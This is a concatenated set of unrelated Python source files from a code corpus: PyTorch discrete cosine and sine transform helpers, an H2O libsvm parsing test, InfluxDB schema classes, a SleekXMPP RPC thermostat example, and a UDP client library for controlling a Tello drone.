y.mul_(N)
if len(x.size()) == 1:
y.squeeze_(0)
return y
def idxt(x, cos_or_sin_flag, expk=None):
""" Batch Inverse Discrete Cosine Transformation without normalization to coefficients.
Compute y_u = \sum_i x_i cos(pi*(2u+1)*i/(2N)),
Impelements the 2N padding trick to solve IDCT with IFFT in the following link,
https://github.com/tensorflow/tensorflow/blob/r1.10/tensorflow/python/ops/spectral_ops.py
1. Multiply by 2*exp(1j*pi*u/(2N))
2. Pad x by zeros
3. Perform IFFT
4. Extract the real part
@param x batch 1D tensor for conversion
@param cos_or_sin_flag 0 for cosine tranformation and 1 or sine transformation
@param expk 2*exp(j*pi*k/(2N))
"""
# last dimension
N = x.size(-1)
if expk is None:
expk = get_expk(N, dtype=x.dtype, device=x.device)
# multiply by 2*exp(1j*pi*u/(2N))
x_pad = x.unsqueeze(-1).mul(expk)
# pad second last dimension, excluding the complex number dimension
x_pad = F.pad(x_pad, (0, 0, 0, N), 'constant', 0)
if len(x.size()) == 1:
x_pad.unsqueeze_(0)
# the last dimension here becomes -2 because complex numbers introduce a new dimension
# Must use IFFT here
y = torch.ifft(x_pad, signal_ndim=1, normalized=False)[..., 0:N, cos_or_sin_flag]
y.mul_(N)
if len(x.size()) == 1:
y.squeeze_(0)
return y
def dct2_2N(x, expk0=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk0 with length M
@param expk1 with length N
"""
return dct_2N(dct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
def dct2_N(x, perm0=None, expk0=None, perm1=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param perm0 with length M
@param expk0 with length M
@param perm1 with length N
@param expk1 with length N
"""
return dct_N(dct_N(x.transpose(dim0=-2, dim1=-1), perm=perm0, expk=expk0).transpose_(dim0=-2, dim1=-1), perm=perm1, expk=expk1)
def idct2_2N(x, expk0=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk0 with length M
@param expk1 with length N
"""
return idct_2N(idct_2N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
def idct2_N(x, expk0=None, expk1=None):
""" Batch 2D Discrete Cosine Transformation without normalization to coefficients.
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk0 with length M
@param expk1 with length N
"""
return idct_N(idct_N(x.transpose(dim0=-2, dim1=-1), expk0).transpose_(dim0=-2, dim1=-1), expk1)
def dst2(x, expkp1_0=None, expkp1_1=None):
""" Batch 2D Discrete Sine Transformation without normalization to coefficients.
Compute 1D DST twice.
@param x batch tensor, the 2D part is MxN
@param expkp1_0 with length M
@param expkp1_1 with length N
"""
return dst(dst(x.transpose(dim0=-2, dim1=-1), expkp1_0).transpose_(dim0=-2, dim1=-1), expkp1_1)
def idcct2(x, expk_0=None, expk_1=None):
""" Batch 2D Inverse Discrete Cosine-Cosine Transformation without normalization to coefficients.
It computes following equation, which is slightly different from standard DCT formulation.
y_{u, v} = \sum_p \sum_q x_{p, q} cos(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
Compute 1D DCT twice.
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
"""
return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose(dim0=-2, dim1=-1)
# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)
def idsct2(x, expk_0=None, expk_1=None):
""" Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.
It computes following equation, which is slightly different from standard DCT formulation.
y_{u, v} = \sum_p \sum_q x_{p, q} sin(pi/M*p*(u+0.5)) cos(pi/N*q*(v+0.5))
Compute 1D DST and then 1D DCT.
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
"""
return idxt(idxt(x, 0, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)
# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1), 0, expk_1)
def idcst2(x, expk_0=None, expk_1=None):
""" Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients.
It computes following equation, which is slightly different from standard DCT formulation.
y_{u, v} = \sum_p \sum_q x_{p, q} cos(pi/M*p*(u+0.5)) sin(pi/N*q*(v+0.5))
Compute 1D DCT and then 1D DST.
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
"""
return idxt(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1)
# return idxt(idxt(x.transpose(dim0=-2, dim1=-1), 0, expk_0).transpose_(dim0=-2, dim1=-1), 1, expk_1)
def idxst_idct(x, expk_0=None, expk_1=None):
'''
Batch 2D Inverse Discrete Sine-Cosine Transformation without normalization to coefficients.
Compute idxst(idct(x))
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
'''
return idxt(idct_N(x, expk_1).transpose_(dim0=-2, dim1=-1), 1, expk_0).transpose_(dim0=-2, dim1=-1)
def idct_idxst(x, expk_0=None, expk_1=None):
'''
Batch 2D Inverse Discrete Cosine-Sine Transformation without normalization to coefficients.
Compute idct(idxst(x)).
@param x batch tensor, the 2D part is MxN
@param expk_0 with length M, 2*exp(-1j*pi*k/(2M))
@param expk_1 with length N, 2*exp(-1j*pi*k/(2N))
'''
return idct_N(idxt(x, 1, expk_1).transpose_(dim0=-2, dim1=-1), expk_0).transpose_(dim0=-2, dim1=-1)
| 2.484375 | 2 |
py/testdir_multi_jvm/test_many_fp_formats_libsvm_2.py | vkuznet/h2o | 0 | 1226 | <reponame>vkuznet/h2o
import unittest, random, sys, time
sys.path.extend(['.','..','py'])
import h2o, h2o_cmd, h2o_hosts, h2o_browse as h2b, h2o_import as h2i, h2o_exec as h2e, h2o_glm
import h2o_util
zeroList = [
'Result0 = 0',
]
# the first column should use this
exprList = [
'Result<n> = sum(<keyX>[<col1>])',
]
DO_SUMMARY = False
DO_COMPARE_SUM = False
def write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution):
# we can do all sorts of methods off the r object
r = random.Random(SEEDPERFILE)
def addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict):
# colNumber should not be 0, because the output will be there
## val = r.uniform(MIN,MAX)
val = r.triangular(valMin,valMax,0)
valFormatted = h2o_util.fp_format(val, sel)
# force it to be zero in this range. so we don't print zeroes for svm!
if (val > valMin/2) and (val < valMax/2):
return None
else:
rowData.append(str(colNumber) + ":" + valFormatted) # f should always return string
if colNumber in synColSumDict:
synColSumDict[colNumber] += val # sum of column (dict)
else:
synColSumDict[colNumber] = val # sum of column (dict)
return val
valMin = -1e2
valMax = 1e2
classMin = -36
classMax = 36
dsf = open(csvPathname, "w+")
synColSumDict = {0: 0} # guaranteed to have col 0 for output
# even though we try to get a max colCount with random, we might fall short
# track what max we really got
colNumberMax = 0
for i in range(rowCount):
rowData = []
d = random.randint(0,2)
if d==0:
if distribution == 'sparse':
# only one value per row!
# is it okay to specify col 0 in svm? where does the output data go? (col 0)
colNumber = random.randint(1, colCount)
val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)
# did we add a val?
if val and (colNumber > colNumberMax):
colNumberMax = colNumber
else:
# some number of values per row.. 50% or so?
for colNumber in range(1, colCount+1):
val = addRandValToRowStuff(colNumber, valMin, valMax, rowData, synColSumDict)
if val and (colNumber > colNumberMax):
colNumberMax = colNumber
# always need an output class, even if no cols are non-zero
# space is the only valid separator
# add the output (col 0)
# random integer for class
val = random.randint(classMin,classMax)
rowData.insert(0, val)
synColSumDict[0] += val # sum of column (dict)
rowDataCsv = " ".join(map(str,rowData))
# FIX! vary the eol ?
# randomly skip some rows. only write 1/3
dsf.write(rowDataCsv + "\n")
dsf.close()
return (colNumberMax, synColSumDict)
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
global SEED, localhost
SEED = h2o.setup_random_seed()
localhost = h2o.decide_if_localhost()
if (localhost):
h2o.build_cloud(2,java_heap_GB=5)
else:
h2o_hosts.build_cloud_with_hosts()
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_many_fp_formats_libsvm_2(self):
# h2b.browseTheCloud()
SYNDATASETS_DIR = h2o.make_syn_dir()
tryList = [
(100, 10000, 'cA', 300, 'sparse50'),
(100, 10000, 'cB', 300, 'sparse'),
# (100, 40000, 'cC', 300, 'sparse50'),
# (100, 40000, 'cD', 300, 'sparse'),
]
# h2b.browseTheCloud()
for (rowCount, colCount, hex_key, timeoutSecs, distribution) in tryList:
NUM_CASES = h2o_util.fp_format()
for sel in [random.randint(0,NUM_CASES-1)]: # len(caseList)
SEEDPERFILE = random.randint(0, sys.maxint)
csvFilename = "syn_%s_%s_%s_%s.csv" % (SEEDPERFILE, sel, rowCount, colCount)
csvPathname = SYNDATASETS_DIR + '/' + csvFilename
print "Creating random", csvPathname
# dict of col sums for comparison to exec col sums below
(colNumberMax, synColSumDict) = write_syn_dataset(csvPathname, rowCount, colCount, SEEDPERFILE, sel, distribution)
selKey2 = hex_key + "_" + str(sel)
print "This dataset requires telling h2o parse it's a libsvm..doesn't detect automatically"
parseResult = h2i.import_parse(path=csvPathname, schema='put', hex_key=selKey2,
timeoutSecs=timeoutSecs, doSummary=False, parser_type='SVMLight')
print csvFilename, 'parse time:', parseResult['response']['time']
print "Parse result['destination_key']:", parseResult['destination_key']
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)
num_cols = inspect['num_cols']
num_rows = inspect['num_rows']
print "\n" + csvFilename
# SUMMARY****************************************
# gives us some reporting on missing values, constant values,
# to see if we have x specified well
# figures out everything from parseResult['destination_key']
# needs y to avoid output column (which can be index or name)
# assume all the configs have the same y..just check with the firs tone
goodX = h2o_glm.goodXFromColumnInfo(y=0,
key=parseResult['destination_key'], timeoutSecs=300, noPrint=True)
if DO_SUMMARY:
summaryResult = h2o_cmd.runSummary(key=selKey2, max_column_display=colNumberMax+1, timeoutSecs=timeoutSecs)
h2o_cmd.infoFromSummary(summaryResult, noPrint=True)
self.assertEqual(colNumberMax+1, num_cols, msg="generated %s cols (including output). parsed to %s cols" % (colNumberMax+1, num_cols))
# Exec (column sums)*************************************************
if DO_COMPARE_SUM:
h2e.exec_zero_list(zeroList)
colResultList = h2e.exec_expr_list_across_cols(None, exprList, selKey2, maxCol=colNumberMax+1,
timeoutSecs=timeoutSecs)
print "\n*************"
print "colResultList", colResultList
print "*************"
self.assertEqual(rowCount, num_rows, msg="generated %s rows, parsed to %s rows" % (rowCount, num_rows))
# need to fix this for compare to expected
# we should be able to keep the list of fp sums per col above
# when we generate the dataset
### print "\nsynColSumDict:", synColSumDict
for k,v in synColSumDict.iteritems():
if DO_COMPARE_SUM:
# k should be integers that match the number of cols
self.assertTrue(k>=0 and k<len(colResultList))
compare = colResultList[k]
print "\nComparing col sums:", v, compare
# Even though we're comparing floating point sums, the operations probably should have
# been done in same order, so maybe the comparison can be exact (or not!)
self.assertAlmostEqual(v, compare, places=0,
msg='%0.6f col sum is not equal to expected %0.6f' % (v, compare))
synMean = (v + 0.0)/rowCount
# enums don't have mean, but we're not enums
mean = float(inspect['cols'][k]['mean'])
# our fp formats in the syn generation sometimes only have two places?
self.assertAlmostEqual(mean, synMean, places=0,
msg='col %s mean %0.6f is not equal to generated mean %0.6f' % (k, mean, synMean))
num_missing_values = inspect['cols'][k]['num_missing_values']
self.assertEqual(0, num_missing_values,
msg='col %s num_missing_values %d should be 0' % (k, num_missing_values))
if __name__ == '__main__':
h2o.unit_main()
| 2.125 | 2 |
python/influx/database_tables.py | SA-22C-smoothswing/spectrum-protect-sppmon | 0 | 1227 | <filename>python/influx/database_tables.py
"""Provides all database and table structures used for the influx database.
Classes:
Datatype
Database
Table
RetentionPolicy
"""
from __future__ import annotations
from enum import Enum, unique
import re
import json
from typing import Any, Dict, List, Set, Tuple, Union
import influx.influx_queries as Queries
from utils.execption_utils import ExceptionUtils
from utils.influx_utils import InfluxUtils
from utils.spp_utils import SppUtils
@unique
class Datatype(Enum):
"""
This enum differentiates between the different Influx-Types.
By declaring the type SPPMon will automatically insert the data in the right format.
The order of the types within the enum is important: bool is a int, but a int is not a bool.
Important: only use `TIME` for epoch timestamps, *NOT* for durations or counts.
`TIME` is automatically converted into second format.
Note: The return type is just a helper and not of a big use.
Methods:
get_auto_datatype - get Datatype enum by value typ analysis
"""
NONE = type(None)
"""Undeclared, only use as a placeholder."""
STRING = str
"""Special symbols and \" will be escaped."""
BOOL = bool
"""Any boolean, be aware it is a subtype of int.
TODO Untested, saves as Boolean within Influx.
"""
INT = int
"""Appends a 'i' at end of number to declare. Fails if the data is mixed with any other type."""
FLOAT = float
"""Unchanged value. Default Influx numeric data type. Mixing with ints works."""
TIMESTAMP = type(int)
"""Automatic transform a timestamp into seconds. Important: Only use for Epoch timestamps, not duration or counter.
Caution: Type is just a placeholder, do not set to int - causing problems!
"""
@staticmethod
def get_auto_datatype(value: Any) -> Datatype:
"""get Datatype enum by value typ analysis. Usage should be avoided.
Only use if no datatype is declared. It skips time-type and fails if ints are mixed with floats.
If no type is detected emits a warning and returns `NONE`.
Arguments:
value {Union[str, float, int, bool, None]} -- Value to be analyzed
Returns:
Datatype -- type of value or `NONE`.
"""
for enum in Datatype:
if(enum is Datatype.TIMESTAMP):
continue
if(isinstance(value, enum.value)):
return enum
ExceptionUtils.error_message(f"No auto type found for {value}")
return Datatype.NONE
class RetentionPolicy:
"""Represents a influxdb retention policy.
By this policy it is declared afer which ammount of time a dataset is deleted from the DB.
Attributes
name - name of RP
database - associated database
duration - time until the data is purged
replication - How often the date is replicated
shard_duration - Size of memory-groups
default - whether this is the default RP
Methods
to_dict - creates a dict out of the values
"""
@property
def name(self) -> str:
"""name of the Retention Policy"""
return self.__name
@property
def database(self) -> Database:
"""associated database"""
return self.__database
@property
def duration(self) -> str:
"""time until the data is purged"""
return self.__duration
@property
def replication(self) -> int:
"""How often the date is replicated. We only have 1 db instance so replication is always 1"""
return self.__replication
@property
def shard_duration(self) -> str:
"""Size of memory-groups. Default time is 0s, then the db decides what to take"""
return self.__shard_duration
@property
def default(self) -> bool:
""" whether this is the default RP"""
return self.__default
def __init__(self, name: str, database: Database, duration: str,
replication: int = 1, shard_duration: str = "0s",
default: bool = False) -> None:
if(not name):
raise ValueError("need retention policy name for creation")
if(not database):
raise ValueError("need retention policy database for creation")
if(not duration):
raise ValueError("need retention policy duration for creation")
if(not replication):
raise ValueError("need retention policy replication factor for creation")
if(not shard_duration):
raise ValueError("need retention policy shard duration for creation")
if(default is None):
raise ValueError("need retention policy default setting for creation")
self.__name = name
self.__database = database
self.__replication = replication
self.__shard_duration = shard_duration
self.__default = default
try:
# str due usage of method
self.__duration: str = InfluxUtils.transform_time_literal(duration, single_vals=False)
except ValueError as error:
ExceptionUtils.exception_info(error)
raise ValueError(f"duration for retention policy {name} is not in the correct time format")
try:
# str due usage of method
self.__shard_duration: str = InfluxUtils.transform_time_literal(shard_duration, single_vals=False)
except ValueError as error:
ExceptionUtils.exception_info(error)
raise ValueError(f"shard duration for retention policy {name} is not in the correct time format")
def to_dict(self) -> Dict[str, Union[str, int, bool]]:
"""Used to create a dict out of the values, able to compare to influxdb-created dict"""
return {
'name': self.name,
'duration': self.duration,
'shardGroupDuration': self.__shard_duration,
'replicaN': self.__replication,
'default': self.default
}
def __str__(self) -> str:
return f"{self.database.name}.{self.name}"
def __repr__(self) -> str:
return f"Retention Policy: {self.name}"
def __eq__(self, o: object) -> bool:
if(isinstance(o, RetentionPolicy)):
return o.to_dict() == self.to_dict()
return False
def __hash__(self) -> int:
return hash(json.dumps(self.to_dict(), sort_keys=True))
class Table:
"""Represents a measurement in influx. Contains pre-defined tag and field definitions.
Attributes
name - name of table
fields - dict of field name with datatype
tags - tags as list of str
time_key - key name of the timestamp field
retention_policy - retention policy associated with this table
database - table is declared within this database
Methods
split_by_table_def - Split the given dict into a pre-defined set of tags, fields and a timestamp.
"""
@property
def fields(self) -> Dict[str, Datatype]:
"""fields of the table, name is key, value is datatype"""
return self.__fields
@property
def tags(self) -> List[str]:
"""tags of the table, datatype always string"""
return self.__tags
@property
def time_key(self) -> str:
"""name of the timestamp key"""
return self.__time_key
@property
def name(self) -> str:
"""name of the table"""
return self.__name
@property
def retention_policy(self) -> RetentionPolicy:
"""retention policy associated with this table"""
return self.__retention_policy
@property
def database(self) -> Database:
"""table is declared within this database"""
return self.__database
__bad_measurement_characters: List[str] = [' ', ',']
"""those chars need to be escaped within a measurement/table name"""
def __init__(self, database: Database, name: str, fields: Dict[str, Datatype] = None,
tags: List[str] = None, time_key: str = 'time', retention_policy: RetentionPolicy = None) -> None:
if(not database):
raise ValueError("need database to create table")
if(not name):
raise ValueError("need str name to create table")
if(not time_key):
raise ValueError("time key cannot be None")
if(not fields):
fields = {}
if(not tags):
tags = []
if(not retention_policy):
retention_policy = next(filter(lambda rp: rp.default, database.retention_policies))
self.__database: Database = database
self.__fields: Dict[str, Datatype] = fields
self.__tags: List[str] = tags
self.__time_key: str = time_key
self.__retention_policy = retention_policy
# escape not allowed characters in Measurement
for bad_character in self.__bad_measurement_characters:
if(re.search(bad_character, name)):
name = name.replace(bad_character, '\\%c'% bad_character)
self.__name: str = name
def __str__(self) -> str:
return f"{self.database.name}.{self.retention_policy.name}.{self.name}"
def __repr__(self) -> str:
return f"Table: {self.name}"
def split_by_table_def(self, mydict: Dict[str, Any]) -> Tuple[
Dict[str, Any], Dict[str, Any], Union[str, int, None]]:
"""Split the given dict into a pre-defined set of tags, fields and a timestamp.
None-Values and empty strings are ignored.
If there are no fields declared, it will split by a default pattern.
Undeclared collums will produce a warning.
This function uses the tag/field and timestamp definiton declared within this table.
Arguments:
self {Table} -- Table with predefined set of tags and fields
mydict {Dict[str, Any]} -- dict with colums as keys. None-Values are ignored
Raises:
ValueError: If no dict is given or not of type dict.
Returns:
(Dict[str, Any], Dict[str, Any], int) -- Tuple of: tags, fields, timestamp
"""
if(not mydict):
raise ValueError("need at least one value in dict to split")
# if table is not defined use default split
if(not self.fields):
return InfluxUtils.default_split(mydict=mydict)
# fill dicts
# table.fields is a dict, we only need the keys
fields: Dict[str, Any] = dict.fromkeys(self.fields.keys(), None)
tags: Dict[str, Any] = dict.fromkeys(self.tags, None)
# what field should be recorded as time
time_stamp_field = self.time_key
# helper variable to only overwrite if it is not the time_stamp_field
time_overwrite_allowed = True
# actualy timestamp saved
time_stamp: Union[str, int, None] = None
for (key, value) in mydict.items():
# Ignore empty entrys
if(value is None or (isinstance(value, str) and not value)):
continue
# Check timestamp value if it matches any of predefined time names
if(key in time_stamp_field or key in InfluxUtils.time_key_names):
# sppmonCTS has lowest priority, only set if otherwise None
if(time_stamp is None and key == SppUtils.capture_time_key):
time_stamp = value
# time_stamp_field is highest priority. Do not overwrite it.
elif(key is time_stamp_field):
time_overwrite_allowed: bool = False
time_stamp = value
# if time_stamp_field is not used yet, overwrite sppmonCaptureTime or others
elif(time_overwrite_allowed):
time_stamp = value
# if no overwrite allowed, continue and drop field
else:
continue
# Otherwise check for Keys or Fields
if(key in fields):
fields[key] = value
elif(key in tags):
tags[key] = value
elif(key in InfluxUtils.time_key_names or key in time_stamp_field):
continue
else:
ExceptionUtils.error_message(f"Not all columns for table {self.name} are declared: {key}")
# before key+"MISSING" : Removed to avoid death-circle on repeated queries.
fields[key] = value
return (tags, fields, time_stamp)
class Database:
"""
Represents a instance of influx database. Define all table definitions within the init method.
Attributes
name - name of the database
tables - tables with predefined tags & fields
retention_policies - Set of all provided Retention Policies
continuous_queries - Set of all provided Continuous Queries
Methods
__getitem__ - [] access on the tables via name. Creates empty table if missing.
"""
@property
def tables(self) -> Dict[str, Table]:
"""Dict with table definitions to look up"""
return self.__tables
@property
def retention_policies(self) -> Set[RetentionPolicy]:
"""Set of all provided Retention Policies"""
return self.__retention_policies
@property
def continuous_queries(self) -> Set[Queries.ContinuousQuery]:
"""Set of all provided Continuous Queries"""
return self.__continuous_queries
@property
def name(self) -> str:
"""name of the database, also used as reference"""
return self.__name
def __getitem__(self, table_name: str) -> Table:
"""Aquire a instance of a predefined table, returns a empty table if it was not defined. []-Access.
Arguments:
table_name {str} -- name of the table you want to aquire
Returns:
Table -- Instance of a predefined table, otherwise new empty table
"""
return self.tables.get(table_name, Table(self, table_name))
def __str__(self) -> str:
return self.name
def __repr__(self) -> str:
return f'Database: {self.name}'
def __init__(self, name: str):
self.__name: str = name
self.__tables: Dict[str, Table] = {}
self.__retention_policies: Set[RetentionPolicy] = set()
self.__continuous_queries: Set[Queries.ContinuousQuery] = set()
| 3.046875 | 3 |
examples/rpc_server_side.py | calendar42/SleekXMPP--XEP-0080- | 1 | 1228 | <gh_stars>1-10
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2011 <NAME>
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
from sleekxmpp.plugins.xep_0009.remote import Endpoint, remote, Remote, \
ANY_ALL
import threading
class Thermostat(Endpoint):
def FQN(self):
return 'thermostat'
def __init(self, initial_temperature):
self._temperature = initial_temperature
self._event = threading.Event()
@remote
def set_temperature(self, temperature):
print("Setting temperature to %s" % temperature)
self._temperature = temperature
@remote
def get_temperature(self):
return self._temperature
@remote(False)
def release(self):
self._event.set()
def wait_for_release(self):
self._event.wait()
def main():
session = Remote.new_session('[email protected]/rpc', '*****')
thermostat = session.new_handler(ANY_ALL, Thermostat, 18)
thermostat.wait_for_release()
session.close()
if __name__ == '__main__':
main()
| 1.859375 | 2 |
lib/TelloAPI.py | wuhuikai/DeepDrone | 1 | 1229 | import cv2
import time
import socket
import threading
class Response(object):
def __init__(self):
pass
def recv(self, data):
pass
def pop(self):
pass
def empty(self):
pass
class Command(Response):
def __init__(self):
super(Command, self).__init__()
self.response = None
self.lock = threading.RLock()
def recv(self, data):
with self.lock:
self.response = data.decode('utf-8')
def pop(self):
with self.lock:
response, self.response = self.response, None
return response
def empty(self):
with self.lock:
return self.response is None
class State(Response):
def __init__(self):
super(State, self).__init__()
self.response = {}
self.lock = threading.RLock()
def recv(self, data):
with self.lock:
self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in item}
def pop(self):
return self.response
def empty(self):
return False
class Client(object):
def __init__(self, local_port, buffer_size, daemon, response):
self.response = response
self.buffer_size = buffer_size
self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.socket.bind(('', local_port))
self.receive_thread = threading.Thread(target=self._receive_thread)
self.receive_thread.daemon = daemon
self.receive_thread.start()
def __del__(self):
"""Closes the local socket."""
self.socket.close()
def _receive_thread(self):
"""Listens for responses from the Tello.
Runs as a thread, sets self.response to whatever the Tello last returned.
"""
while True:
try:
self.response.recv(self.socket.recv(self.buffer_size))
except Exception as e:
print(e)
break
def empty(self):
return self.response.empty()
def pop(self):
return self.response.pop()
class Video(object):
def __init__(self, daemon=True):
self.video = cv2.VideoCapture('udp://@0.0.0.0:11111')
if not self.video.isOpened():
raise RuntimeError('Failed to connect to Tello')
self.frame = None
self.lock = threading.RLock()
self.thread = threading.Thread(target=self._update_thread)
self.thread.daemon = daemon
self.thread.start()
def __del__(self):
self.video.release()
def _update_thread(self):
while True:
ok, frame = self.video.read()
if ok:
with self.lock:
self.frame = frame
def empty(self):
with self.lock:
return self.frame is None
def pop(self):
with self.lock:
frame, self.frame = self.frame, None
return frame
class Tello(object):
def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True):
"""Connects to Tello in command mode.
Args:
local_port (int): port of local machine for receiving command response.
command_timeout (float): seconds to wait for a response of command.
state (bool): receive state from Tello?
video (bool): receive video from Tello?
Raises:
RuntimeError: If the Tello rejects the attempt to enter command mode or open the video stream.
"""
self.command_timeout = command_timeout
self.response_client = Client(local_port, 1024, True, Command())
self.state_client = Client(8890, 1024, True, State()) if state else None
self.tello_address = ('192.168.10.1', 8889)
self.enter_command_mode()
self.video_client = None
if video:
self.open_video_stream()
self.video_client = Video(True)
def send_command(self, command, with_return=True):
"""Sends a command to the Tello and waits for a response.
If self.command_timeout is exceeded before a response is received,
a RuntimeError exception is raised.
Args:
command (str): Command to send.
Returns:
str: Response from Tello.
Raises:
RuntimeError: If no response is received within self.timeout seconds.
"""
self.response_client.pop()
self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address)
if not with_return:
return
st = time.time()
while self.response_client.empty():
if time.time() - st >= self.command_timeout:
raise RuntimeError('No response to command')
return self.response_client.pop()
def state(self):
return self.state_client.pop() if self.state_client else None
def read_frame(self):
if self.video_client is None:
raise RuntimeError('Video is not available')
while self.video_client.empty():
pass
return self.video_client.pop()
def enter_command_mode(self):
if self.send_command('command') != 'ok':
raise RuntimeError('Tello rejected the attempt to enter command mode')
def take_off(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('takeoff')
def land(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('land')
def open_video_stream(self):
if self.send_command('streamon') != 'ok':
raise RuntimeError('Tello rejected to open the video stream')
def close_video_stream(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('streamoff')
def emergency_shutdown(self):
"""
return: 'ok' or 'error'
"""
return self.send_command('emergency')
def move_up(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('up {}'.format(x), with_return)
def move_down(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('down {}'.format(x), with_return)
def move_left(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('left {}'.format(x), with_return)
def move_right(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('right {}'.format(x), with_return)
def move_forward(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('forward {}'.format(x), with_return)
def move_backward(self, x, with_return=False):
"""
param x: int, [20, 500]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('back {}'.format(x), with_return)
def rotate_clockwise(self, x, with_return=False):
"""
param x: int, [1, 3600]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('cw {}'.format(x), with_return)
def rotate_counter_clockwise(self, x, with_return=False):
"""
param x: int, [1, 3600]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('ccw {}'.format(x), with_return)
def flip_left(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip l', with_return)
def flip_right(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip r', with_return)
def flip_forward(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip f', with_return)
def flip_backward(self, with_return=False):
"""
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('flip b', with_return)
def goto(self, x, y, z, speed, with_return=False):
"""
param x: int, [20, 500]
param y: int, [20, 500]
param z: int, [20, 500]
param speed: int, [10-100]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('go {} {} {} {}'.format(x, y, z, speed), with_return)
def goto_curve(self, x1, y1, z1, x2, y2, z2, speed, with_return=False):
"""fly a curve defined by (0, 0, 0), (x1, y1, z1), (x2, y2, z2) with speed
param x1, x2: int, [-500, 500]
param y1, y2: int, [-500, 500]
param z1, z2: int, [-500, 500]
param speed: int, [10-60]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed), with_return)
def set_speed(self, speed, with_return=False):
"""
param speed: int, [10-100]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('speed {}'.format(speed), with_return)
def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False):
"""
param left_right_velocity: int, [-100, 100]
param forward_backward_velocity: int, [-100, 100]
param up_down_velocity: int, [-100, 100]
param rotate_velocity: int, [-100, 100]
param with_return: bool
return: 'ok' or 'error'
"""
return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return)
def get(self, command, split=False):
"""
param command
param split: bool, multiple values?
return: int or list(int)
"""
result = self.send_command(command)
if split:
return [int(x) for x in result.split(' ')]
else:
return int(result)
def get_speed(self):
"""
return: int, [10, 100]
"""
return self.get('speed?')
def get_battery(self):
"""
return: int, [0, 100]
"""
return self.get('battery?')
def get_flight_time(self):
"""
return: int
"""
return self.get('time?')
def get_relative_height(self):
"""
return: int, [10, 3000]
"""
return self.get('height?')
def get_temperature(self):
"""
return: int, [0, 90]
"""
return self.get('temp?')
def get_imu_pose(self):
"""[pitch, roll, yaw]
return: list(int), [[-89, 89], [-179, 179], [-179, 179]]
"""
return self.get('attitude?', split=True)
